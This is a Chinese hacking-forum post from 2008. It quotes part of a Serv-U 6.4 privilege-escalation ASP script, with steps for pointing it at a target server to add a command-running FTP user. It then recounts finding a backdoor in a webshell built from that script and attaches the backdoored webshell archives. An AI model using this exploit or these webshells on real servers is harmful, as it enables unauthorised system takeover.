注册
登录
论坛
搜索
插件
默认风格
默认风格_6hOY
D Dark
greenwall
jeans
fashion
私人消息 (0)
公共消息 (0)
论坛任务 (0)
系统消息 (0)
好友消息 (0)
帖子消息 (0)
【3.A.S.T】网络安全爱好者
»
技术交流
» [讨论]希望擅长asp解密的大鸟来瞧瞧
返回列表
发帖
s37su37
发短消息
加为好友
s37su37
当前离线
UID
1224
帖子
251
精华
0
积分
667
威望
1075
金钱
829
阅读权限
70
在线时间
2 小时
注册时间
2008-7-16
最后登录
2009-2-13
3.A.S.T少校
帖子
251
积分
667
威望
1075
金钱
829
在线时间
2 小时
1
楼
跳转到
»
倒序看帖
打印
字体大小:
t
T
发表于 2008-7-23 08:37
|
只看该作者
[讨论]希望擅长asp解密的大鸟来瞧瞧
asp
,
解密
,
讨论
[讨论]希望擅长asp解密的大鸟来瞧瞧
议题作者:亲爱的小层
信息来源:邪恶八进制信息安全团队(
www.eviloctal.com
)
这事挺郁闷的,2008-1-13 在逛黑吧的时候发现了一个文章《SERV-U 6.4提权脚本通杀SERV-U版本》 好象是好东东,于是装老鸟进去看了下,结果完全看不懂。附代码
提权的代码如下:
ftpport = 65500
timeout=3
loginuser = "User " & user & vbCrLf
loginpass = "Pass " & pass & vbCrLf
deldomain = "-DeleteDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf
mt = "SITE MAINTENANCE" & vbCrLf
newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _
修改ftpport为21
修改newdomain后面的goldsun| IP(为要提权的服务器的IP地址)|
修改newuser后面的 -IP=IP地址和上面一样(为要提权的服务器的IP地址)...OK.....提权...会用FTP增加一个可以
执行命令的用户.....有个这个用户什么不能做
没想到第二天,有个叫幽月的高人做了个 提权通杀Serv-u所有版本(语音)
http://www.hack58.net/Soft/html/9/18/2008/2008011412078.htm
里面使用了文章里的代码,做了个新款的asp马, 于是去他blog看了一下,
啊喔,还真的有 这个新版asp的下载,于是兴高采烈的下来试试。。 顺手看看有没有后门啥的,结果在缓存里发现了点东西。
1.jpg
(23 KB)
后门图
2008-1-16 11:05
于是继续装老鸟看了下代码,可惜技术有限,代码被处理过,找不出后门的位置.
一时气愤不过,于是做了个揭露教程,没想到第二天在黑吧 揭露教程跟这款asp马 同时更新提供下载。。 汗。绝对的汗......
中午被后门作者找上门了,给我灌输了一些邪恶的知识,他 正义无私的形象差点就在我心里树立起来了....
2.jpg
(42 KB)
聊天记录
2008-1-16 11:05
3.jpg
(24 KB)
聊天记录
2008-1-16 11:05
4.jpg
(23 KB)
聊天记录
2008-1-16 11:05
聊天记录就放这么多了,免的老鸟看烦了。呵呵
本想事情应该这么结束了,没想到 晚上....
5.jpg
(11 KB)
聊天记录
2008-1-16 11:05
汗,莫非跟我聊回天,被我的佛力感染,放下屠刀了。 老呐再入地狱检测下。。
结果还是死性不改。。 为了不冤枉他,找个朋友开虚拟机,远程上去。结果还是...无话
6.jpg
(27 KB)
后门图
2008-1-16 11:05
细想一下,估计明天黑吧 应该也会出现他发布的所谓 去后门版本的asp马吧
不如我再来个揭露教程,再搞笑一下 同时提供下载。呵呵, 目前教程已发。不知道会不会公布。呵呵
废话了那么久,大鸟见谅....
附带 第一版本的后门马 和所谓的 未加密版本的后门马。。。。
第一版本的后门马里的PHP马 已经在黑吧被人详细找出后门位置,
见
http://www.hack58.net/Soft/html/12/24/2007/2007122811896.htm
asp马目前好象没见人说找出来了,更别提所谓的未加密版本的后门位置在那。。
实在蛮佩服作者 放后门的技术,施主,再听老呐一言: 放下屠刀,力地成佛。
别丢鸡蛋,闪. 希望管理员能把帖子转移一下。呵呵
附件
第一版本的后门马.gz
(255 KB)
2008-1-16 11:05, 下载次数: 45
第一版本的后门马
未加密版本的后门马.gz
(51 KB)
2008-1-16 11:05, 下载次数: 37
未加密版本的后门马
帖子3 精华
0
积分13 阅读权限40 性别男 在线时间14 小时
收藏
分享
返回列表
【 新 手 入 门 】
初入江湖
有问必答
软件交流
程序设计
黑客播报
操作系统
Windows专区
Unix 专区
【 技 术 交 流 】
原创专区
QQ技巧
反黑知识
网站建设
教程发布
技术交流
免杀技术
0day发布
专题归类
私服技术
【 论 坛 水 区 】
被黑站点
激情灌水
极品贴图
开心乐园
影音专区
广告专区
【 论 坛 管 理 】
新人报到
论坛管理
勋章申请
[收藏此主题]
[关注此主题的新回复]
[通过 QQ、MSN 分享给朋友]
全国地图
@@@ 加入本站会员 一个月月赚1200+的秘密@@@